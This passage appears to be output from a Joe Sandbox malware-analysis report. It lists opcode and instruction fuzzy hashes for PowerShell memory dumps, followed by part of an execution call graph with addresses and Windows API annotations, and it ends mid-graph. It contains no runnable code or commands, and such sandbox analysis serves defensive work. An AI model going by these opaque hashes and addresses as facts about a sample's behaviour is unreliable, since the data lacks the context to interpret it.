                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: c8473b7a29589a604ebd4ca40c544e6ea87a886cc7bc8b3832230937d30e838c
                                                                                                                                                                                                                              • Instruction ID: 544cf4c1e13093ce260a51ccc44a41f0d4c8918105fe495d54683e5a16babbf4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c8473b7a29589a604ebd4ca40c544e6ea87a886cc7bc8b3832230937d30e838c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 66423B26E0CA464FDB51EB9C98925F97BA0FF523A5F4801B7C44CCB197DE28A846C3D1
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000C.00000002.1551067542.00007FF885090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF885090000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_7ff885090000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 2dfb14f3dcdb572691e42227983c1db8b9b9d15dbfdaf46a6f6dfaf0915c4298
                                                                                                                                                                                                                              • Instruction ID: 5706a31c87015b5d3dcf942cf8d9b6de5867bbdae509b23f17c631a0e785fa3a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2dfb14f3dcdb572691e42227983c1db8b9b9d15dbfdaf46a6f6dfaf0915c4298
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F2221531D0CA8A8FEF55DF68C895AB97BE1FF55764F1401BAC04CCB196DA28AC41CB81
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000C.00000002.1551067542.00007FF885090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF885090000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_7ff885090000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 1ad92a22340b3d4f6556d36007782467a7a0a08d91cbf59ee9d9179bb6f36258
                                                                                                                                                                                                                              • Instruction ID: 77f862b1d4ddeeecfb43543de97f2e07d937c5386ae9b023f5d52126bd960113
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1ad92a22340b3d4f6556d36007782467a7a0a08d91cbf59ee9d9179bb6f36258
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F031E87191CB884FDB189B5CAC466F97BE0FB99711F00426FE459D3292CA60AC15CBC3
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000C.00000002.1549167547.00007FF884F7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF884F7D000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_7ff884f7d000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 025fc480f1494255a3095274773606d5bd01076e4f46c64e7166e87925925d0b
                                                                                                                                                                                                                              • Instruction ID: 3ab68de9f7979c0f714b660552bd118a0a8722fd588e5efba2e5d1ecb9d1a1a4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 025fc480f1494255a3095274773606d5bd01076e4f46c64e7166e87925925d0b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1741D57240DFC44FE7569B3998959523FF0FF56360B2905EFD088CB1A3D628A84AC792
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000C.00000002.1551067542.00007FF885090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF885090000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_7ff885090000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 0540608763ee2a177c7d6c38e0ec69c17280961b788b480d23c06ec309897fe8
                                                                                                                                                                                                                              • Instruction ID: e59a50ec6e654d89609bd0d65d3697695b0213e5082674579e6ec1e28aa918c4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0540608763ee2a177c7d6c38e0ec69c17280961b788b480d23c06ec309897fe8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DC31437480D7885EDB669BA88C456F67FE4EB93331F0441AFD099C7093CA24581AC792
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000C.00000002.1551931312.00007FF885160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF885160000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_7ff885160000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 88c7975d2042c3779df69cec3d0fe97586e0610f5915c7e18e087df13d61dd03
                                                                                                                                                                                                                              • Instruction ID: 4c232a04c6930a6bc780f4e0ab0f3273d10900b086fe416cbebb3f1b48d98f99
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 88c7975d2042c3779df69cec3d0fe97586e0610f5915c7e18e087df13d61dd03
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9321D271E0DA864FEB96CA1C68956703BE1FF66760B1401BFC08DCB2A6DD18A845C741
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000C.00000002.1551931312.00007FF885160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF885160000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_7ff885160000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 2f8798f1e23c1b34d7b5e9707af8de9ba002ec7b1af8ed5dc0e806bdd34db552
                                                                                                                                                                                                                              • Instruction ID: 1d2e4b46c2751e835e1181ec33facdd33d3ca011b5d319f72274df7267297403
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2f8798f1e23c1b34d7b5e9707af8de9ba002ec7b1af8ed5dc0e806bdd34db552
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 76112935E0D6894FE756DB989054278BBE1FF48360F6841BFC44EDB187DE28A841C341
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000C.00000002.1551067542.00007FF885090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF885090000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_7ff885090000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 70aa00635f972a6bac396fc46e5d72351287b17824183693041b1918d6b4f3e0
                                                                                                                                                                                                                              • Instruction ID: ace0bbd3db313ae980c6e8695b3d96aefc90a2d3e6f3a2326e5b86d9afaf64d5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 70aa00635f972a6bac396fc46e5d72351287b17824183693041b1918d6b4f3e0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D501A73010CB0C4FDB44EF0CE451AA5B3E0FB85360F10052DE58AC3651DA36E882CB42
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000C.00000002.1551067542.00007FF885090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF885090000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_7ff885090000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 187deb6d728f0e957a93801f34589cdff15a2b60ae2ecd85b9f9f5a1c35a72ef
                                                                                                                                                                                                                              • Instruction ID: e56489c427cdd083b98c66c727d8649b42001b09690caf37b506de59c94d1c8f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 187deb6d728f0e957a93801f34589cdff15a2b60ae2ecd85b9f9f5a1c35a72ef
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A8F0BB7660CA8C4FDB56DF1C9C554E57FA0FF66251B0901BBD848C7161D7228858C7D2
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000C.00000002.1551931312.00007FF885160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF885160000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_7ff885160000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: de302eeccb7de5e059da72f856387f2f043255202f72032577eedb287ee4d6e4
                                                                                                                                                                                                                              • Instruction ID: e6815af7f74b0846f027a92f32ad584e2071822dffdce20efee8af9c4efdcb8a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: de302eeccb7de5e059da72f856387f2f043255202f72032577eedb287ee4d6e4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DDF0C831A0D6994FE746E7A854526E8BFE1FF49264F2400FEC04DD7253C91D9845C741
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000C.00000002.1551931312.00007FF885160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF885160000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_7ff885160000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: c2fb744e5988be4165ceff35a24de6348ccb6520a1933130b3fd65c31f752790
                                                                                                                                                                                                                              • Instruction ID: 8a427eb3625c25f7e908b05f69cf6fa33fac25999df0fc5d62b66b21ad67fd16
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c2fb744e5988be4165ceff35a24de6348ccb6520a1933130b3fd65c31f752790
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0AF0BE3AA0C5568FE669EA4CE4858A877E0FF49370B2100BAE14DCB1A7CB29FC44C741
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000C.00000002.1551931312.00007FF885160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF885160000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_7ff885160000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 0a8116d475d7aa9ca45bc519fa57e178bfac6ef6fbc0e0ea42d7aba32646ad30
                                                                                                                                                                                                                              • Instruction ID: 193f55ba0482d2a32cbeed59d52e5126f3ff7ef324223763a8be597386d6553c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0a8116d475d7aa9ca45bc519fa57e178bfac6ef6fbc0e0ea42d7aba32646ad30
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F9F05E3AA0C5458FD755EA5CE4855A877E0FF09371B1500B6E14DCB067DB69EC44C741
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000C.00000002.1551067542.00007FF885090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF885090000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_7ff885090000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: ,M_^$-M_^$;!$,M_
                                                                                                                                                                                                                              • API String ID: 0-3813663136
                                                                                                                                                                                                                              • Opcode ID: 069a76245eddc4e49c02077827a9ecc54f13c97a177316ba632aedd9cada8b37
                                                                                                                                                                                                                              • Instruction ID: e662d299f35b625e99fad1574c821e304a2f1cb4906434efef4043340a8f7bf2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 069a76245eddc4e49c02077827a9ecc54f13c97a177316ba632aedd9cada8b37
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3961E767D0D7C68FE702932858B51E67FA0AF13AE9B0901FBD4D48F0A7ED081816E356
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000C.00000002.1551067542.00007FF885090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF885090000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_7ff885090000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: L_^$L_^$L_^$L_^
                                                                                                                                                                                                                              • API String ID: 0-2357752022
                                                                                                                                                                                                                              • Opcode ID: a4064907116e27672597e13b79a581632e3d891413fdfffd62148cdd47f66dbe
                                                                                                                                                                                                                              • Instruction ID: 61276e561e9bfb41a47844282814366b98e69ce2605765d71eac9cacca20aa59
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a4064907116e27672597e13b79a581632e3d891413fdfffd62148cdd47f66dbe
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6D31E8A790DBC60FF75346295D651A57FC0BF625A8B0E04F7C9989E197FF189C0AC201
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000046.00000002.1731036665.00007FF886700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886700000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_70_2_7ff886700000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: b258dcc9826c22b6238a8ebd2d189ea28f092b6a703c34a213ff59baaf41749d
                                                                                                                                                                                                                              • Instruction ID: e791be89de80628e240da0f999b9e3dc62c0f7a2df5c3b788c48357f80847f0d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b258dcc9826c22b6238a8ebd2d189ea28f092b6a703c34a213ff59baaf41749d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1E71C270D09A488FDB59EB6CD8656ECBBF1FF4A310F1441AED049D7296CA35AC02CB91
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000046.00000002.1731775962.00007FF8867D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8867D0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_70_2_7ff8867d0000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: b468f009c83ceb7c388384dd249fc2221d88e3c78ace615d8f10741de0965e0e
                                                                                                                                                                                                                              • Instruction ID: 09f2115da46afa7eb07e6cb6518ef89456b2627e5dadfe36bdd2024322405bed
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b468f009c83ceb7c388384dd249fc2221d88e3c78ace615d8f10741de0965e0e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AB221721E0DBC94FE796A72858612B57BE1FF86290B1806FBD04DC71D7DD18AC09C392
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000046.00000002.1731036665.00007FF886700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886700000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_70_2_7ff886700000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                                                                                                                              • Instruction ID: b79654a04d9e77375290d9654693e2105d407be262a57873138dc4fe777d56cf
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A701677111CB0D4FD744EF0CE451AA5B7E0FB95364F10056EE58AC3655DB36E881CB46
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000046.00000002.1731036665.00007FF886700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886700000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_70_2_7ff886700000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: (0{$8,{$H1{$P/{$-{$/{
                                                                                                                                                                                                                              • API String ID: 0-274568262
                                                                                                                                                                                                                              • Opcode ID: f6f5fe7db19a2739ee4a854024b60b3125d153a2dbef602f9878d1896bd0adcd
                                                                                                                                                                                                                              • Instruction ID: 2bed470ca48507984817c92e221b21ea3ab876f18d09a84ca8068616c9e72fad
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f6f5fe7db19a2739ee4a854024b60b3125d153a2dbef602f9878d1896bd0adcd
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FE21E652C0E9C15FF51A552838281B51AA2FF91BA4F1811BBD08C172CFE858DD1987F2

                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                              Execution Coverage:7.9%
                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                              Signature Coverage:0.5%
                                                                                                                                                                                                                              Total number of Nodes:1193
                                                                                                                                                                                                                              Total number of Limit Nodes:40
                                                                                                                                                                                                                              execution_graph 38221 7ff7cf8882f0 38222 7ff7cf888306 38221->38222 38235 7ff7cf88836f 38221->38235 38223 7ff7cf888324 38222->38223 38226 7ff7cf888371 38222->38226 38222->38235 38341 7ff7cf8a2414 61 API calls 38223->38341 38225 7ff7cf888347 38342 7ff7cf8a1998 138 API calls 38225->38342 38226->38235 38350 7ff7cf8a1998 138 API calls 38226->38350 38229 7ff7cf88835e 38343 7ff7cf8a18ac 38229->38343 38234 7ff7cf888578 38236 7ff7cf88b540 147 API calls 38234->38236 38244 7ff7cf88a410 38235->38244 38241 7ff7cf88858f 38236->38241 38237 7ff7cf88b540 147 API calls 38237->38234 38238 7ff7cf888634 38352 7ff7cf8da610 38238->38352 38241->38238 38351 7ff7cf889628 175 API calls 38241->38351 38361 7ff7cf8b7a68 38244->38361 38246 7ff7cf88853a 38249 7ff7cf88b540 38246->38249 38253 7ff7cf88b55f setbuf 38249->38253 38250 7ff7cf88b5a1 38251 7ff7cf88b5d8 38250->38251 38252 7ff7cf88b5b8 38250->38252 38509 7ff7cf8b8c1c 38251->38509 38395 7ff7cf88aba0 38252->38395 38253->38250 38391 7ff7cf88a4d0 38253->38391 38255 7ff7cf88b5d3 38257 7ff7cf8da610 _handle_error 8 API calls 38255->38257 38259 7ff7cf88854f 38257->38259 38258 7ff7cf88b67f 38260 7ff7cf88bc91 38258->38260 38261 7ff7cf88b6a5 38258->38261 38262 7ff7cf88bbae 38258->38262 38259->38234 38259->38237 38260->38255 38265 7ff7cf8a2574 126 API calls 38260->38265 38261->38255 38275 7ff7cf88b6b5 38261->38275 38288 7ff7cf88b79f 38261->38288 38263 7ff7cf8b8d00 48 API calls 38262->38263 38266 7ff7cf88bc5c 38263->38266 38265->38255 38578 7ff7cf8b8d38 48 API calls 38266->38578 38270 7ff7cf88bc69 38579 7ff7cf8b8d38 48 API calls 38270->38579 38273 7ff7cf88bc76 38580 7ff7cf8b8d38 48 API calls 38273->38580 38275->38255 38543 7ff7cf8b8d00 38275->38543 38276 7ff7cf88bc84 38581 7ff7cf8b8d88 48 API calls 38276->38581 38281 7ff7cf88b726 38547 7ff7cf8b8d38 48 API calls 38281->38547 38283 7ff7cf88b733 38284 7ff7cf88b749 38283->38284 38548 7ff7cf8b8d88 48 API calls 38283->38548 38291 7ff7cf88b75c 38284->38291 38549 7ff7cf8b8d38 48 API calls 38284->38549 38287 7ff7cf88b779 38550 7ff7cf8b8f94 38287->38550 38292 7ff7cf88b8e5 38288->38292 38560 7ff7cf88c3c8 CharLowerW CharUpperW 38288->38560 38290 7ff7cf8b8d00 48 API calls 38290->38291 38291->38287 38291->38290 38561 7ff7cf8cd840 WideCharToMultiByte 38292->38561 38296 7ff7cf88b9a1 38298 7ff7cf8b8d00 48 API calls 38296->38298 38299 7ff7cf88b9c4 38298->38299 38564 7ff7cf8b8d38 48 API calls 38299->38564 38301 7ff7cf88b910 38301->38296 38563 7ff7cf88945c 55 API calls _handle_error 38301->38563 38302 7ff7cf88b9d1 38565 7ff7cf8b8d38 48 API calls 38302->38565 38304 7ff7cf88b9de 38566 7ff7cf8b8d88 48 API calls 38304->38566 38306 7ff7cf88b9eb 38567 7ff7cf8b8d88 48 API calls 38306->38567 38308 7ff7cf88ba0b 38309 7ff7cf8b8d00 48 API calls 38308->38309 38310 7ff7cf88ba27 38309->38310 38568 7ff7cf8b8d88 48 API calls 38310->38568 38312 7ff7cf88ba37 38313 7ff7cf88ba49 38312->38313 38569 7ff7cf8cbc48 15 API calls 38312->38569 38570 7ff7cf8b8d88 48 API calls 38313->38570 38316 7ff7cf88ba59 38317 7ff7cf8b8d00 48 API calls 38316->38317 38318 7ff7cf88ba66 38317->38318 38319 7ff7cf8b8d00 48 API calls 38318->38319 38320 7ff7cf88ba78 38319->38320 38571 7ff7cf8b8d38 48 API calls 38320->38571 38322 7ff7cf88ba85 38572 7ff7cf8b8d88 48 API calls 38322->38572 38324 7ff7cf88ba92 38325 7ff7cf88bacd 38324->38325 38573 7ff7cf8b8d88 48 API calls 38324->38573 38575 7ff7cf8b8e3c 38325->38575 38327 7ff7cf88bab2 38574 7ff7cf8b8d88 48 API calls 38327->38574 38331 7ff7cf88bb33 38332 7ff7cf88bb53 38331->38332 38335 7ff7cf8b8e3c 48 API calls 38331->38335 38336 7ff7cf88bb6e 38332->38336 38338 7ff7cf8b8e3c 48 API calls 38332->38338 38333 7ff7cf8b8d00 48 API calls 38337 7ff7cf88bb09 38333->38337 38334 7ff7cf8b8e3c 48 API calls 38334->38331 38335->38332 38339 7ff7cf8b8f94 126 API calls 38336->38339 38337->38331 38337->38334 38338->38336 38339->38255 38341->38225 38342->38229 38344 7ff7cf8a18db 38343->38344 38345 7ff7cf8a18ca 38343->38345 38344->38235 38345->38344 38346 7ff7cf8a18d6 38345->38346 38347 7ff7cf8a18de 38345->38347 38803 7ff7cf8a1c24 38346->38803 38808 7ff7cf8a1930 38347->38808 38350->38235 38351->38238 38353 7ff7cf8da61a 38352->38353 38354 7ff7cf888663 38353->38354 38355 7ff7cf8da6a0 IsProcessorFeaturePresent 38353->38355 38356 7ff7cf8da6b7 38355->38356 38816 7ff7cf8da894 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 38356->38816 38358 7ff7cf8da6ca 38817 7ff7cf8da66c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 38358->38817 38362 7ff7cf88a434 38361->38362 38364 7ff7cf8b7a8d 38361->38364 38362->38246 38369 7ff7cf8a22e0 38362->38369 38363 7ff7cf8b7aaf 38363->38362 38366 7ff7cf8a22e0 12 API calls 38363->38366 38364->38363 38374 7ff7cf8b7340 157 API calls 38364->38374 38367 7ff7cf8b7adf 38366->38367 38375 7ff7cf8a2440 38367->38375 38385 7ff7cf8a20b4 38369->38385 38372 7ff7cf8a2307 38372->38246 38374->38363 38376 7ff7cf8a2454 38375->38376 38377 7ff7cf8a246a SetFilePointer 38375->38377 38378 7ff7cf8a24ad 38376->38378 38383 7ff7cf89cd00 10 API calls 38376->38383 38377->38378 38379 7ff7cf8a248d GetLastError 38377->38379 38378->38362 38379->38378 38380 7ff7cf8a2497 38379->38380 38380->38378 38384 7ff7cf89cd00 10 API calls 38380->38384 38388 7ff7cf8a2130 38385->38388 38389 7ff7cf8a20d0 38385->38389 38386 7ff7cf8a2102 SetFilePointer 38387 7ff7cf8a2126 GetLastError 38386->38387 38386->38388 38387->38388 38388->38372 38390 7ff7cf89cd00 10 API calls 38388->38390 38389->38386 38392 7ff7cf88a4ea 38391->38392 38393 7ff7cf88a4ee 38392->38393 38394 7ff7cf8a2440 12 API calls 38392->38394 38393->38250 38394->38393 38396 7ff7cf88abbf setbuf 38395->38396 38397 7ff7cf8b8c1c 48 API calls 38396->38397 38401 7ff7cf88abf5 38397->38401 38398 7ff7cf88aca7 38399 7ff7cf88b4af 38398->38399 38400 7ff7cf88acbf 38398->38400 38402 7ff7cf88b4ff 38399->38402 38407 7ff7cf8a2574 126 API calls 38399->38407 38403 7ff7cf88acc8 38400->38403 38404 7ff7cf88b35c 38400->38404 38401->38398 38401->38399 38582 7ff7cf899be0 38401->38582 38622 7ff7cf8b72c0 38402->38622 38405 7ff7cf88ad60 38403->38405 38410 7ff7cf88acdd 38403->38410 38448 7ff7cf88aea7 38403->38448 38409 7ff7cf8b8eec 48 API calls 38404->38409 38421 7ff7cf8da610 _handle_error 8 API calls 38405->38421 38407->38402 38412 7ff7cf88b395 38409->38412 38413 7ff7cf88ace6 38410->38413 38414 7ff7cf88ad68 38410->38414 38416 7ff7cf88b3ad 38412->38416 38621 7ff7cf889e2c 48 API calls 38412->38621 38413->38405 38593 7ff7cf8b8eec 38413->38593 38419 7ff7cf8b8eec 48 API calls 38414->38419 38415 7ff7cf8990b8 75 API calls 38418 7ff7cf88ac8f 38415->38418 38417 7ff7cf8b8eec 48 API calls 38416->38417 38422 7ff7cf88b3d4 38417->38422 38418->38398 38428 7ff7cf8a2574 126 API calls 38418->38428 38424 7ff7cf88ad9c 38419->38424 38425 7ff7cf88b52b 38421->38425 38426 7ff7cf88b3e6 38422->38426 38431 7ff7cf8b8eec 48 API calls 38422->38431 38429 7ff7cf8b8eec 48 API calls 38424->38429 38425->38255 38434 7ff7cf8b8eec 48 API calls 38426->38434 38428->38398 38430 7ff7cf88ada9 38429->38430 38433 7ff7cf8b8eec 48 API calls 38430->38433 38431->38426 38432 7ff7cf8b8eec 48 API calls 38435 7ff7cf88ad31 38432->38435 38436 7ff7cf88adb5 38433->38436 38437 7ff7cf88b451 38434->38437 38438 7ff7cf8b8eec 48 API calls 38435->38438 38439 7ff7cf8b8eec 48 API calls 38436->38439 38440 7ff7cf88b471 38437->38440 38447 7ff7cf8b8eec 48 API calls 38437->38447 38441 7ff7cf88ad46 38438->38441 38442 7ff7cf88adc2 38439->38442 38444 7ff7cf88b486 38440->38444 38449 7ff7cf8b8e3c 48 API calls 38440->38449 38443 7ff7cf8b8f94 126 API calls 38441->38443 38446 7ff7cf8b8d00 48 API calls 38442->38446 38443->38405 38445 7ff7cf8b8f94 126 API calls 38444->38445 38445->38405 38450 7ff7cf88adcf 38446->38450 38447->38440 38451 7ff7cf88afda 38448->38451 38611 7ff7cf889b64 48 API calls _handle_error 38448->38611 38449->38444 38452 7ff7cf8990b8 75 API calls 38450->38452 38459 7ff7cf88aff2 38451->38459 38612 7ff7cf889d98 48 API calls 38451->38612 38455 7ff7cf88ae22 38452->38455 38456 7ff7cf8b8e3c 48 API calls 38455->38456 38457 7ff7cf88ae33 38456->38457 38458 7ff7cf8b8e3c 48 API calls 38457->38458 38462 7ff7cf88ae48 38458->38462 38461 7ff7cf88b02b 38459->38461 38613 7ff7cf889efc 48 API calls _handle_error 38459->38613 38460 7ff7cf88b0af 38465 7ff7cf88b0c8 38460->38465 38615 7ff7cf88a1a0 48 API calls 2 library calls 38460->38615 38461->38460 38614 7ff7cf88a2c8 48 API calls 38461->38614 38597 7ff7cf8c9ce4 38462->38597 38467 7ff7cf88b0e2 38465->38467 38616 7ff7cf88a350 48 API calls _handle_error 38465->38616 38471 